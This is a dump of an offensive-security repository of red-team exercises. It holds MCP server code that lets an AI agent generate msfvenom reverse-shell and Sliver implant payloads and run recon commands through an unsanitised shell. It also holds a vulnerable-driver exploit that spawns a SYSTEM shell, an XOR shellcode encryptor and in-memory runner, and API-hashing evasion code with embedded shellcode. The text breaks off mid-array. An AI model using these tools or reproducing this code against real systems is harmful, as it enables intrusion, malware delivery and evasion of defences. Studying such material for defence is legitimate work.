├── AI-MCP ├── mcp_payload.py └── mcp_recon.py ├── Drivers-Vulnerability-Research ├── VulnerableDriver.sys └── exploit-getsystem.cpp ├── README.md ├── Shellcode-Encrypted ├── Encryptor.cpp └── Runner.cpp ├── WindowsAPIHashing.cpp ├── dylib-injection.c ├── htmlsmuggling.html ├── main-hookchainshellcode.c ├── privilege-escalation └── token-manipulation.cpp ├── shellcode-runner-Movfuscator.c ├── shellcode-runner-exercise12.cpp ├── shellcode-runner-exercises13.cpp ├── shellcode-runner-sliverC2.rs ├── shellcoderunner-exercise-1.cpp └── spotify_profile.yaotl /AI-MCP/mcp_payload.py: -------------------------------------------------------------------------------- 1 | # mcp_payload_server.py 2 | import asyncio 3 | from mcp.server.fastmcp import FastMCP 4 | from pydantic import BaseModel 5 | import subprocess 6 | 7 | mcp = FastMCP("payload-generator") 8 | 9 | 10 | def execute(command: str) -> str: 11 | """Executes a shell command and returns output or error.""" 12 | try: 13 | result = subprocess.run(command, shell=True, check=True, capture_output=True, text=True) 14 | return result.stdout.strip() 15 | except subprocess.CalledProcessError as e: 16 | return f"[ERROR] {e.stderr.strip()}" 17 | 18 | 19 | class MsfvenomArgs(BaseModel): 20 | payload: str 21 | lhost: str 22 | lport: int 23 | 24 | 25 | @mcp.tool() 26 | async def generate_msfvenom(req: MsfvenomArgs) -> str: 27 | """ 28 | Generate a Windows payload using msfvenom. 29 | 30 | :param payload: Payload string (e.g., windows/x64/meterpreter/reverse_tcp) 31 | :type payload: str 32 | :param lhost: Local host IP for reverse connection 33 | :type lhost: str 34 | :param lport: Local port for reverse connection 35 | :type lport: int 36 | :return: Output of msfvenom execution 37 | :rtype: str 38 | """ 39 | cmd = f"msfvenom -p {req.payload} LHOST={req.lhost} LPORT={req.lport} -f exe -o payload.exe" 40 | return execute(cmd) 41 | 42 | 43 | class DonutArgs(BaseModel): 44 | file_path: str 45 | 46 | 47 | @mcp.tool() 48 | async def generate_donut(req: DonutArgs) -> str: 49 | """ 50 | Generate shellcode from an EXE or DLL using Donut. 51 | 52 | :param file_path: Path to the executable or DLL file 53 | :type file_path: str 54 | :return: Output from Donut execution 55 | :rtype: str 56 | """ 57 | return execute(f"donut {req.file_path}") 58 | 59 | 60 | class SliverArgs(BaseModel): 61 | listener: str 62 | format: str = "shellcode" 63 | arch: str = "x64" 64 | 65 | 66 | @mcp.tool() 67 | async def generate_sliver(req: SliverArgs) -> str: 68 | """ 69 | Generate a payload using Sliver. 70 | 71 | :param listener: Name of the listener configured in Sliver 72 | :type listener: str 73 | :param format: Payload format (e.g., shellcode, exe, macho) 74 | :type format: str 75 | :param arch: Target architecture (x64 or x86) 76 | :type arch: str 77 | :return: Output of Sliver client generation 78 | :rtype: str 79 | """ 80 | cmd = f"sliver-client generate --listener {req.listener} --format {req.format} --arch {req.arch}" 81 | return execute(cmd) 82 | 83 | 84 | if __name__ == "__main__": 85 | asyncio.run(mcp.run_stdio()) 86 | -------------------------------------------------------------------------------- /AI-MCP/mcp_recon.py: -------------------------------------------------------------------------------- 1 | # mcp_recon_server.py 2 | import asyncio 3 | from mcp.server.fastmcp import FastMCP 4 | from pydantic import BaseModel 5 | import subprocess 6 | 7 | mcp = FastMCP("recon-tools") 8 | 9 | 10 | def execute(command: str) -> str: 11 | """Executes a shell command and returns output or error.""" 12 | try: 13 | result = subprocess.run(command, shell=True, check=True, capture_output=True, text=True) 14 | return result.stdout.strip() 15 | except subprocess.CalledProcessError as e: 16 | return f"[ERROR] {e.stderr.strip()}" 17 | 18 | 19 | class DomainArgs(BaseModel): 20 | domain: str 21 | 22 | 23 | @mcp.tool() 24 | async def run_subfinder(req: DomainArgs) -> str: 25 | """ 26 | Enumerate subdomains using subfinder. 27 | 28 | :param domain: Target domain to enumerate 29 | :type domain: str 30 | :return: Subdomains found 31 | :rtype: str 32 | """ 33 | return execute(f"subfinder -d {req.domain} -silent") 34 | 35 | 36 | @mcp.tool() 37 | async def run_assetfinder(req: DomainArgs) -> str: 38 | """ 39 | Enumerate subdomains using assetfinder. 40 | 41 | :param domain: Domain to scan for assets 42 | :type domain: str 43 | :return: Subdomains found 44 | :rtype: str 45 | """ 46 | return execute(f"assetfinder --subs-only {req.domain}") 47 | 48 | 49 | @mcp.tool() 50 | async def run_dig(req: DomainArgs) -> str: 51 | """ 52 | Perform DNS A record lookup using dig. 53 | 54 | :param domain: Domain to query 55 | :type domain: str 56 | :return: DNS A record response 57 | :rtype: str 58 | """ 59 | return execute(f"dig {req.domain}") 60 | 61 | 62 | @mcp.tool() 63 | async def run_whois(req: DomainArgs) -> str: 64 | """ 65 | Perform WHOIS lookup on the domain. 66 | 67 | :param domain: Domain or IP to query 68 | :type domain: str 69 | :return: WHOIS information 70 | :rtype: str 71 | """ 72 | return execute(f"whois {req.domain}") 73 | 74 | 75 | @mcp.tool() 76 | async def run_sslscan(req: DomainArgs) -> str: 77 | """ 78 | Run SSL scan on the target domain. 79 | 80 | :param domain: Domain to scan for SSL/TLS details 81 | :type domain: str 82 | :return: SSL scan results 83 | :rtype: str 84 | """ 85 | return execute(f"sslscan {req.domain}") 86 | 87 | 88 | @mcp.tool() 89 | async def run_tlsx(req: DomainArgs) -> str: 90 | """ 91 | Get TLS certificate data using tlsx. 92 | 93 | :param domain: Target domain for TLS info 94 | :type domain: str 95 | :return: TLS metadata 96 | :rtype: str 97 | """ 98 | return execute(f"tlsx -host {req.domain}") 99 | 100 | 101 | @mcp.tool() 102 | async def run_dnsrecon(req: DomainArgs) -> str: 103 | """ 104 | Run DNS reconnaissance using dnsrecon. 105 | 106 | :param domain: Domain to analyze 107 | :type domain: str 108 | :return: DNS records found by dnsrecon 109 | :rtype: str 110 | """ 111 | return execute(f"dnsrecon -d {req.domain} -t std") 112 | 113 | 114 | if __name__ == "__main__": 115 | asyncio.run(mcp.run_stdio()) 116 | -------------------------------------------------------------------------------- /Drivers-Vulnerability-Research/VulnerableDriver.sys: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CyberSecurityUP/Red-Team-Exercises/0345f0428f032e0223466ae12e9b430bf50ebfe6/Drivers-Vulnerability-Research/VulnerableDriver.sys -------------------------------------------------------------------------------- /Drivers-Vulnerability-Research/exploit-getsystem.cpp: -------------------------------------------------------------------------------- 1 | /* 2 | Exploit Created by Joas to Red Team Exercises 3 | */ 4 | 5 | #include 6 | #include 7 | 8 | #define DEVICE_NAME L"\\\\.\\VulnerableDriverLink" // Device name 9 | #define IOCTL_CODE 2236416 // Found IOCTL code 10 | 11 | void SpawnSystemShell() { 12 | STARTUPINFO si = { sizeof(si) }; 13 | PROCESS_INFORMATION pi; 14 | if (CreateProcess(L"C:\\Windows\\System32\\cmd.exe", NULL, NULL, NULL, FALSE, CREATE_NEW_CONSOLE, NULL, NULL, &si, &pi)) { 15 | std::cout << "[+] SYSTEM cmd opened successfully!" << std::endl; 16 | } 17 | else { 18 | std::cout << "[-] Failed to open cmd.exe, error: " << GetLastError() << std::endl; 19 | } 20 | } 21 | 22 | int main() { 23 | std::cout << "[+] Attempting to open a handle to the driver..." << std::endl; 24 | 25 | HANDLE hDevice = CreateFile(DEVICE_NAME, GENERIC_READ | GENERIC_WRITE, 26 | 0, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL); 27 | 28 | if (hDevice == INVALID_HANDLE_VALUE) { 29 | std::cout << "[-] Failed to open the device. Error code: " << GetLastError() << std::endl; 30 | return 1; 31 | } 32 | 33 | std::cout << "[+] Device opened successfully!" << std::endl; 34 | 35 | DWORD bytesReturned; 36 | BOOL status = DeviceIoControl(hDevice, IOCTL_CODE, NULL, 0, NULL, 0, &bytesReturned, NULL); 37 | 38 | if (status) { 39 | std::cout << "[+] IOCTL sent successfully! Elevating to SYSTEM..." << std::endl; 40 | SpawnSystemShell(); 41 | } 42 | else { 43 | std::cout << "[-] Failed to send IOCTL. Error code: " << GetLastError() << std::endl; 44 | } 45 | 46 | CloseHandle(hDevice); 47 | return 0; 48 | } 49 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Red-Team-Exercises 2 | 3 | ### Repository of my LinkedIn posts about Red Team Exercises 4 | 5 | My LinkedIn: https://www.linkedin.com/in/joas-antonio-dos-santos/ 6 | 7 | 8 | Download Lab Dev: https://mega.nz/file/LB1HTQQL#UQ9dKCj55NO1up-iJxfUqGXpV7uJlSMuONhdr6Z8NBo 9 | 10 | ### LinkedIn posts 11 | 12 | Red Team Exercises #0 - Red Team Dev Machine Download 13 | https://www.linkedin.com/posts/joas-antonio-dos-santos_redteam-redteamdev-redteamexercises-activity-7264053830919614465--0xL?utm_source=share&utm_medium=member_desktop 14 | 15 | Red Team Exercise #1 - How to improve my shellcode runner 16 | https://www.linkedin.com/posts/joas-antonio-dos-santos_hacking-redteam-cybersecurity-activity-7187108451313983489-X0uc?utm_source=share&utm_medium=member_desktop 17 | 18 | Red Team Exercises #2 - What can't be missing from your nginx redirectors? 19 | https://www.linkedin.com/posts/joas-antonio-dos-santos_hacking-redteam-cybersecurity-activity-7187864603651952640-vR8f?utm_source=share&utm_medium=member_desktop 20 | 21 | Red Team Exercises #3 - AMSI Bypass 22 | https://www.linkedin.com/posts/joas-antonio-dos-santos_redteam-cybersecurity-amsibypass-activity-7191807240637472769-XoHb?utm_source=share&utm_medium=member_desktop 23 | 24 | Red Team Exercises #4 - Domain Controller Owned PT.1 25 | https://www.linkedin.com/posts/joas-antonio-dos-santos_hacking-redteam-cybersecurity-activity-7192621508408594432-62X1?utm_source=share&utm_medium=member_desktop 26 | 27 | Red Team Exercises #5 - Spear-Phishing Campaign 1 28 | https://www.linkedin.com/posts/joas-antonio-dos-santos_hacking-redteam-cybersecurity-activity-7193434385600147457-7qzf?utm_source=share&utm_medium=member_desktop 29 | 30 | Red Team Exercises #6- ETW Evasion 31 | https://www.linkedin.com/posts/joas-antonio-dos-santos_hacking-redteam-cybersecurity-activity-7196117085263904769-sjH6?utm_source=share&utm_medium=member_desktop 32 | 33 | Red Team Exercises #7 - PPL Bypass 34 | https://www.linkedin.com/posts/joas-antonio-dos-santos_redteam-cybersecurity-pplevasion-activity-7201681520439296001-pd-g?utm_source=share&utm_medium=member_desktop 35 | 36 | Red Team Exercises #8 - SmartScreen Bypass 37 | https://www.linkedin.com/posts/joas-antonio-dos-santos_hacking-redteam-cybersecurity-activity-7204821933102739456-xpld?utm_source=share&utm_medium=member_desktop 38 | 39 | Red Team Exercises #9 - Process Injection 40 | https://www.linkedin.com/posts/joas-antonio-dos-santos_redteam-cybersecurity-informationsecurity-activity-7207721019216769025-nSUL?utm_source=share&utm_medium=member_desktop 41 | 42 | Red Team Exercises #10 - Spear-Phishing PT.2 43 | https://www.linkedin.com/posts/joas-antonio-dos-santos_hacking-redteam-cybersecurity-activity-7208825346891124736-Jzz4?utm_source=share&utm_medium=member_desktop 44 | 45 | Red Team Exercises #11 - Physical Operations PT.1 46 | https://www.linkedin.com/posts/joas-antonio-dos-santos_redteamexercises-hacking-redteam-activity-7211889402178916353-yRsn?utm_source=share&utm_medium=member_desktop 47 | 48 | Red Team Exercises #12 - AntiVM/Sandbox Evasion 49 | https://www.linkedin.com/posts/joas-antonio-dos-santos_redteamexercises-redteam-cybersecurity-activity-7214304403904724992-9wKd?utm_source=share&utm_medium=member_desktop 50 | 51 | Red Team Exercises #13 - Windows API Hooking and DLL Injection 52 | https://www.linkedin.com/posts/joas-antonio-dos-santos_redteam-redteamexercises-cybersecurity-activity-7216952225355464704-NSRp?utm_source=share&utm_medium=member_desktop 53 | 54 | Red Team Exercises #14 - Direct and Indirect Syscall PT.1 55 | https://www.linkedin.com/posts/joas-antonio-dos-santos_redteam-cybersecurity-syscall-activity-7218437410651594752-h9K5?utm_source=share&utm_medium=member_desktop 56 | 57 | Red Team Exercises #15 - Direct Syscall Lsass Dump 58 | https://www.linkedin.com/posts/joas-antonio-dos-santos_redteam-redteamexercises-informationsecurity-activity-7220958774251913216-aOYp?utm_source=share&utm_medium=member_desktop 59 | 60 | Red Team Exercises #16 - BYOVD Technique PT.1 61 | https://www.linkedin.com/posts/joas-antonio-dos-santos_redteam-redteamexercises-byovd-activity-7222089315663642625-yPSU?utm_source=share&utm_medium=member_desktop 62 | 63 | Red Team Exercises #17 - Active Directory Enumeration PT.1 64 | https://www.linkedin.com/posts/joas-antonio-dos-santos_redteamexercises-redteam-cybersecurity-activity-7225871406910103552-5bjN?utm_source=share&utm_medium=member_desktop 65 | 66 | Red Team Exercises #18 - C2 Redirector PT.1 67 | https://www.linkedin.com/posts/joas-antonio-dos-santos_redteam-redteamexercises-cybersecurity-activity-7227644801649676288-uYB7?utm_source=share&utm_medium=member_desktop 68 | 69 | Red Team Exercises #19 - Alternative, Custom or Undocumented Implementations of Windows API PT.1 70 | https://www.linkedin.com/posts/joas-antonio-dos-santos_redteamexercises-redteamoperations-defenseevasion-activity-7229563862759403520-h9_7?utm_source=share&utm_medium=member_desktop 71 | 72 | Red Team Exercises #20 - EDR Evasion using Hookchain Technique Created by Hélvio Júnior, SCMPA e SCWAP Leader, OSCE3, OSCP, eCXD 73 | https://www.linkedin.com/posts/joas-antonio-dos-santos_redteamexercises-redteam-cybersecurity-activity-7230653751382994944-qZs9?utm_source=share&utm_medium=member_desktop 74 | 75 | Red Team Exercises #21 - Havoc C2 Profile 76 | https://www.linkedin.com/posts/joas-antonio-dos-santos_cyberecurity-redteamexercises-redteam-activity-7236704509563985920-EpJ4?utm_source=share&utm_medium=member_desktop 77 | 78 | Red Team Exercises #22 - MutationGate Technique EDR Evasion by Ziyi Shen 79 | https://www.linkedin.com/posts/joas-antonio-dos-santos_redteam-redteamexercises-cybersecurity-activity-7239467211545886720-JdxV?utm_source=share&utm_medium=member_desktop 80 | 81 | Red Team Exercises #23 - Windows API Hashing 82 | https://www.linkedin.com/posts/joas-antonio-dos-santos_redteam-redteamexercises-cybersecurity-activity-7243227509549371392-curr?utm_source=share&utm_medium=member_desktop 83 | 84 | Red Team Exercises #24 - Powershell Unmanaged or Powershell w/o Powershell 85 | https://www.linkedin.com/posts/joas-antonio-dos-santos_redteam-redteamexercises-cybersecurity-activity-7245123542587981824-fwZT?utm_source=share&utm_medium=member_desktop 86 | 87 | Red Team Exercises #25 - UnhookingPatch by Saad AHLA 88 | https://www.linkedin.com/posts/joas-antonio-dos-santos_redteam-cybersecurity-redteamexercises-activity-7246214606099009536-eVrM?utm_source=share&utm_medium=member_desktop 89 | 90 | Red Team Exercises #26 - Syswhisper3 - (in)Direct Syscall Tool 91 | https://www.linkedin.com/posts/joas-antonio-dos-santos_redteamexercises-redteam-syscalls-ugcPost-7247988959685873666-W0pQ?utm_source=share&utm_medium=member_desktop 92 | 93 | Red Team Exercises #27 - Syscall Hook Detector 94 | https://www.linkedin.com/posts/joas-antonio-dos-santos_redteamexercises-redteam-cybersecurity-activity-7249584951036133376-dc8t?utm_source=share&utm_medium=member_desktop 95 | 96 | Red Team Exercises #28 - Mimikatz Cheatsheet Basic 97 | https://www.linkedin.com/posts/joas-antonio-dos-santos_redteam-redteamexercises-cybersecurity-activity-7253180441560530945-wTeF?utm_source=share&utm_medium=member_desktop 98 | 99 | Red Team Exercises #29 - HTML Smuggling Delivery 100 | https://www.linkedin.com/posts/joas-antonio-dos-santos_redteamexercises-redteam-cybersecurity-activity-7255911100032995328-q-W8?utm_source=share&utm_medium=member_desktop 101 | 102 | Red Team Exercises #30 - Creating a simple Dropper in C++ PT.1 103 | https://www.linkedin.com/posts/joas-antonio-dos-santos_redteam-redteamexercises-cybersecurity-activity-7258880173310132224-o_NG?utm_source=share&utm_medium=member_desktop 104 | 105 | Red Team Exercises #31 - Movfuscator (A fun way to obfuscate, but perhaps not effective these days) 106 | https://www.linkedin.com/posts/joas-antonio-dos-santos_redteamexercises-redteam-cybersecurity-activity-7262037200475721731-McHq?utm_source=share&utm_medium=member_desktop 107 | 108 | Red Team Exercises #32 - Donut Shellcode Generator PT.1 109 | https://www.linkedin.com/posts/joas-antonio-dos-santos_redteam-redteamexercises-cybersecurity-activity-7264846631399776256-nV6Q?utm_source=share&utm_medium=member_desktop 110 | 111 | Red Team Exercises #33 - Shellcode Runner with Kill Switch / Panic Switch 112 | https://www.linkedin.com/posts/joas-antonio-dos-santos_redteamexercises-redteam-cybersecurity-activity-7268790211692670977-kFeT?utm_source=share&utm_medium=member_desktop 113 | 114 | Red Team Exercises #34 - Remote Thread Hijacking 115 | https://www.linkedin.com/posts/joas-antonio-dos-santos_redteamexercises-redteam-cybersecurity-activity-7271003348558860288-M8tu?utm_source=share&utm_medium=member_desktop 116 | 117 | Red Team Exercises #35 - Impacket Collection Tools for Exploitation AD 118 | https://www.linkedin.com/posts/joas-antonio-dos-santos_redteam-redteamexercises-cybersecurity-activity-7278249542951616513-wcAo?utm_source=share&utm_medium=member_desktop 119 | 120 | Red Team Exercises #36 - Persistence Techniques to Windows PT.1 121 | https://www.linkedin.com/posts/joas-antonio-dos-santos_redteam-redteamexercises-persistence-activity-7279705498055028736-vE6K?utm_source=share&utm_medium=member_desktop 122 | 123 | Red Team Exercises #37 - Initial Access with LNK File 124 | https://www.linkedin.com/posts/joas-antonio-dos-santos_redteamexercises-redteam-cybersecurity-activity-7281414057784467457-rbzO?utm_source=share&utm_medium=member_desktop 125 | 126 | Red Team Exercises #38 - SliverC2 and Shellcode Runner with Rust 127 | https://www.linkedin.com/posts/joas-antonio-dos-santos_redteamexercises-redteam-cybersecurity-activity-7283605426347126784-kFT_?utm_source=share&utm_medium=member_desktop 128 | 129 | Red Team Exercises #39 - Get System via Vulnerable Driver Example using Userland Program 130 | https://www.linkedin.com/posts/joas-antonio-dos-santos_redteam-cybersecurity-redteamexercises-activity-7286550523871162368-8LhG?utm_source=share&utm_medium=member_desktop 131 | 132 | Red Team Exercises #40 - Dylib Injection in MacOS 133 | https://www.linkedin.com/posts/joas-antonio-dos-santos_redteamexercises-redteam-cybersecurity-activity-7288198763322511364-VT5d?utm_source=share&utm_medium=member_desktop 134 | 135 | Red Team Exercises #41 - Create your Pipeline to Offensive Development PT.1 MAAS by Joff Thyer 136 | https://www.linkedin.com/posts/joas-antonio-dos-santos_redteam-devops-cybersecurity-activity-7291583180384473088-PHCR?utm_source=share&utm_medium=member_desktop 137 | 138 | Red Team Exercises #42 - Build your own C2 PT.1 139 | https://www.linkedin.com/posts/joas-antonio-dos-santos_redteam-redteamexercises-cybersecurity-activity-7293732841065005056-D7Yi?utm_source=share&utm_medium=member_desktop&rcm=ACoAACQUGCUBpvQerFv0ut2s0MSLX9IwuKJJrbU 140 | 141 | Red Team Exercises #43 - BOF Development PT.1 142 | https://www.linkedin.com/posts/joas-antonio-dos-santos_redteam-redteamexercisees-commandandcontrol-activity-7296747669199216640-IZJO?utm_source=share&utm_medium=member_desktop&rcm=ACoAACQUGCUBpvQerFv0ut2s0MSLX9IwuKJJrbU 143 | 144 | Red Team Exercises #44 - Initial Access with VBA Macro PT.1 145 | https://www.linkedin.com/posts/joas-antonio-dos-santos_hacking-redteam-cybersecurity-activity-7297747587611201536-dc0p?utm_source=share&utm_medium=member_desktop&rcm=ACoAACQUGCUBpvQerFv0ut2s0MSLX9IwuKJJrbU 146 | 147 | Red Team Exercises #45 - Monitoring Techniques for Your Red Team Infrastructure PT.1 148 | https://www.linkedin.com/posts/joas-antonio-dos-santos_redteam-cybersecurity-redteamexercises-activity-7299449832790777858-WcWk?utm_source=share&utm_medium=member_desktop&rcm=ACoAACQUGCUBpvQerFv0ut2s0MSLX9IwuKJJrbU 149 | 150 | Red Team Exercises #46 - Shellcode Encryption using XOR PT.1 151 | https://www.linkedin.com/posts/joas-antonio-dos-santos_redteam-redteamexercises-shellcoderunner-activity-7301643766367416321-qXy3?utm_source=share&utm_medium=member_desktop&rcm=ACoAACQUGCUBpvQerFv0ut2s0MSLX9IwuKJJrbU 152 | 153 | Red Team Exercises #47 - Vulnerability Research in Drivers Example PT.1 154 | https://www.linkedin.com/posts/joas-antonio-dos-santos_redteamexercises-redteam-cybersecurity-activity-7302757314783027200-7pVf?utm_source=share&utm_medium=member_desktop&rcm=ACoAACQUGCUBpvQerFv0ut2s0MSLX9IwuKJJrbU 155 | 156 | Red Team Exercises #48 - Privilege Escalation PT.1 - Token Manipulation 157 | https://www.linkedin.com/posts/joas-antonio-dos-santos_redteamexercises-redteam-cybersecurity-activity-7307015283930488832-Etv-?utm_source=share&utm_medium=member_desktop&rcm=ACoAACQUGCUBpvQerFv0ut2s0MSLX9IwuKJJrbU 158 | 159 | Red Team Exercises #49 - Bypass DLP PT.1 160 | https://www.linkedin.com/posts/joas-antonio-dos-santos_redteam-cybersecurity-redteamexercises-activity-7308108480517701634-xTYQ?utm_source=share&utm_medium=member_desktop&rcm=ACoAACQUGCUBpvQerFv0ut2s0MSLX9IwuKJJrbU 161 | 162 | Red Team Exercises #50 Fake reCaptcha Phishing 163 | https://www.linkedin.com/posts/joas-antonio-dos-santos_redteamexercises-hacking-cybersecurity-activity-7313318885938683904--qu4?utm_source=share&utm_medium=member_desktop&rcm=ACoAACQUGCUBpvQerFv0ut2s0MSLX9IwuKJJrbU 164 | 165 | Red Team Exercises #51 - MCP (Model Context Protocol) in Offensive Security 166 | https://www.linkedin.com/posts/joas-antonio-dos-santos_redteamexercises-redteam-mcp-activity-7316907474106695681-cqjI?utm_source=share&utm_medium=member_desktop&rcm=ACoAACQUGCUBpvQerFv0ut2s0MSLX9IwuKJJrbU 167 | 168 | Red Team Exercises #52 - Abusing Active Directory Certificate Services PT.1 169 | https://www.linkedin.com/posts/joas-antonio-dos-santos_redteam-redteamexercises-cybersecurity-activity-7321354849508335617-dE4S?utm_source=share&utm_medium=member_desktop&rcm=ACoAACQUGCUBpvQerFv0ut2s0MSLX9IwuKJJrbU 170 | 171 | ------------------------------------------------------------------- 172 | 173 | # OSINT-Red-Team-Exercises 174 | 175 | OSINT for Red Team Exercises - #1 Dorks Search using sitedorks Tool 176 | https://www.linkedin.com/posts/joas-antonio-dos-santos_cybersecurity-redteamexercises-osintexercises-activity-7253736729285672961-SKDq?utm_source=share&utm_medium=member_desktop 177 | 178 | OSINT for Red Team Exercises #2 - Credential Leaks: Exploring Targets with Compromised Data Intelligence PT.1 179 | https://www.linkedin.com/posts/joas-antonio-dos-santos_cybersecurity-osint-osintforredteam-activity-7257723022843781120-Otii?utm_source=share&utm_medium=member_desktop 180 | 181 | OSINT for Red Team Exercises #3 - Whois and Resolving Domains 182 | https://www.linkedin.com/posts/joas-antonio-dos-santos_osintexercises-redteam-cybersecurity-activity-7265813615121727491-PKos?utm_source=share&utm_medium=member_desktop 183 | 184 | OSINT for Red Team Exercises #4 - Deep/Dark Web Search PT.1 185 | https://www.linkedin.com/posts/joas-antonio-dos-santos_osint-redteam-cybersecurity-activity-7275701771451199488-uIxe?utm_source=share&utm_medium=member_desktop 186 | 187 | -------------------------------------------------------------------------------- /Shellcode-Encrypted/Encryptor.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | 6 | // XOR encryption key 7 | const std::string key = "redteamexercises"; 8 | 9 | // Hardcoded shellcode 10 | unsigned char shellcode[] = 11 | "\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50" 12 | "\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52"; 13 | 14 | const size_t shellcode_size = sizeof(shellcode); 15 | 16 | // XOR encryption function 17 | void xor_encrypt(std::vector& data, const std::string& key) { 18 | for (size_t i = 0; i < data.size(); i++) { 19 | data[i] ^= key[i % key.size()]; 20 | } 21 | } 22 | 23 | int main() { 24 | std::vector encrypted_shellcode(shellcode, shellcode + shellcode_size); 25 | 26 | xor_encrypt(encrypted_shellcode, key); 27 | 28 | std::ofstream outputFile("encrypted_shellcode.h"); 29 | if (!outputFile) { 30 | std::cerr << "Error creating output file.\n"; 31 | return 1; 32 | } 33 | 34 | outputFile << "#pragma once\n"; 35 | outputFile << "unsigned char encrypted_shellcode[] = {"; 36 | for (size_t i = 0; i < encrypted_shellcode.size(); i++) { 37 | outputFile << "0x" << std::hex << (int)encrypted_shellcode[i]; 38 | if (i != encrypted_shellcode.size() - 1) outputFile << ", "; 39 | } 40 | outputFile << "};\n"; 41 | outputFile << "const size_t shellcode_size = " << encrypted_shellcode.size() << ";\n"; 42 | 43 | outputFile.close(); 44 | std::cout << "[+] Encrypted shellcode saved in 'encrypted_shellcode.h'\n"; 45 | return 0; 46 | } 47 | -------------------------------------------------------------------------------- /Shellcode-Encrypted/Runner.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | 4 | // Hardcoded encrypted shellcode 5 | unsigned char encrypted_shellcode[] = { }; 6 | const size_t shellcode_size = sizeof(encrypted_shellcode); 7 | 8 | // Decryption key (same as used in the Encryptor) 9 | const std::string key = "redteamexercises"; 10 | 11 | // XOR decryption function 12 | void xor_decrypt(unsigned char* data, size_t size, const std::string& key) { 13 | for (size_t i = 0; i < size; i++) { 14 | data[i] ^= key[i % key.size()]; 15 | } 16 | } 17 | 18 | int main() { 19 | std::cout << "[+] Starting decryption and shellcode execution..." << std::endl; 20 | 21 | // Decrypt the shellcode 22 | xor_decrypt(encrypted_shellcode, shellcode_size, key); 23 | 24 | // Allocate RW (Read-Write) memory 25 | void* exec_mem = VirtualAlloc(nullptr, shellcode_size, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE); 26 | if (!exec_mem) { 27 | std::cerr << "[-] Memory allocation failed\n"; 28 | return 1; 29 | } 30 | 31 | // Copy decrypted shellcode to allocated memory 32 | memcpy(exec_mem, encrypted_shellcode, shellcode_size); 33 | 34 | // Change memory permissions to RX (Read-Execute) 35 | DWORD oldProtect; 36 | if (!VirtualProtect(exec_mem, shellcode_size, PAGE_EXECUTE_READ, &oldProtect)) { 37 | std::cerr << "[-] Failed to modify memory permissions\n"; 38 | return 1; 39 | } 40 | 41 | std::cout << "[+] Executing shellcode..." << std::endl; 42 | 43 | // Create a thread to execute the shellcode 44 | HANDLE hThread = CreateThread(nullptr, 0, (LPTHREAD_START_ROUTINE)exec_mem, nullptr, 0, nullptr); 45 | if (!hThread) { 46 | std::cerr << "[-] Failed to create thread\n"; 47 | return 1; 48 | } 49 | 50 | WaitForSingleObject(hThread, INFINITE); 51 | return 0; 52 | } 53 | -------------------------------------------------------------------------------- /WindowsAPIHashing.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | 4 | DWORD CalculateHash(const char* functionName) { 5 | DWORD hash = 0x35; 6 | 7 | while (*functionName) { 8 | hash = (hash * 0xab10f29f) + (*functionName); 9 | hash &= 0xFFFFFF; 10 | functionName++; 11 | } 12 | 13 | return hash; 14 | } 15 | 16 | HMODULE GetModuleBase(const char* moduleName) { 17 | HMODULE hModule = GetModuleHandleA(moduleName); 18 | return hModule; 19 | } 20 | 21 | FARPROC ResolveFunctionByHash(HMODULE hModule, DWORD targetHash) { 22 | if (!hModule) return nullptr; 23 | 24 | PIMAGE_DOS_HEADER dosHeader = (PIMAGE_DOS_HEADER)hModule; 25 | PIMAGE_NT_HEADERS ntHeaders = (PIMAGE_NT_HEADERS)((BYTE*)hModule + dosHeader->e_lfanew); 26 | 27 | DWORD exportDirRVA = ntHeaders->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress; 28 | PIMAGE_EXPORT_DIRECTORY exportDir = (PIMAGE_EXPORT_DIRECTORY)((BYTE*)hModule + exportDirRVA); 29 | 30 | DWORD* namesRVA = (DWORD*)((BYTE*)hModule + exportDir->AddressOfNames); 31 | 32 | for (DWORD i = 0; i < exportDir->NumberOfNames; i++) { 33 | const char* functionName = (const char*)((BYTE*)hModule + namesRVA[i]); 34 | 35 | DWORD hash = CalculateHash(functionName); 36 | 37 | if (hash == targetHash) { 38 | WORD ordinal = ((WORD*)((BYTE*)hModule + exportDir->AddressOfNameOrdinals))[i]; 39 | 40 | DWORD functionRVA = ((DWORD*)((BYTE*)hModule + exportDir->AddressOfFunctions))[ordinal]; 41 | FARPROC functionAddress = (FARPROC)((BYTE*)hModule + functionRVA); 42 | 43 | return functionAddress; 44 | } 45 | } 46 | 47 | return nullptr; 48 | } 49 | 50 | unsigned char shellcode[] = "\xfc\x48\x81\xe4\xf0\xff\xff\xff\xe8\xd0\x00\x00\x00\x41" 51 | "\x51\x41\x50\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60" 52 | "\x3e\x48\x8b\x52\x18\x3e\x48\x8b\x52\x20\x3e\x48\x8b\x72" 53 | "\x50\x3e\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9\x48\x31\xc0\xac" 54 | "\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41\x01\xc1\xe2" 55 | "\xed\x52\x41\x51\x3e\x48\x8b\x52\x20\x3e\x8b\x42\x3c\x48" 56 | "\x01\xd0\x3e\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x6f" 57 | "\x48\x01\xd0\x50\x3e\x8b\x48\x18\x3e\x44\x8b\x40\x20\x49" 58 | "\x01\xd0\xe3\x5c\x48\xff\xc9\x3e\x41\x8b\x34\x88\x48\x01" 59 | "\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41\x01" 60 | "\xc1\x38\xe0\x75\xf1\x3e\x4c\x03\x4c\x24\x08\x45\x39\xd1" 61 | "\x75\xd6\x58\x3e\x44\x8b\x40\x24\x49\x01\xd0\x66\x3e\x41" 62 | "\x8b\x0c\x48\x3e\x44\x8b\x40\x1c\x49\x01\xd0\x3e\x41\x8b" 63 | 